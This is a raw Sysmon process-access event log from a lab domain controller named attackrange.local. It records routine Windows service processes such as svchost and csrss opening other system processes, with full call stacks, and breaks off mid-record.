13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1301-00000000A301}4804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1101-00000000A301}3028C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1101-00000000A301}3028C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windo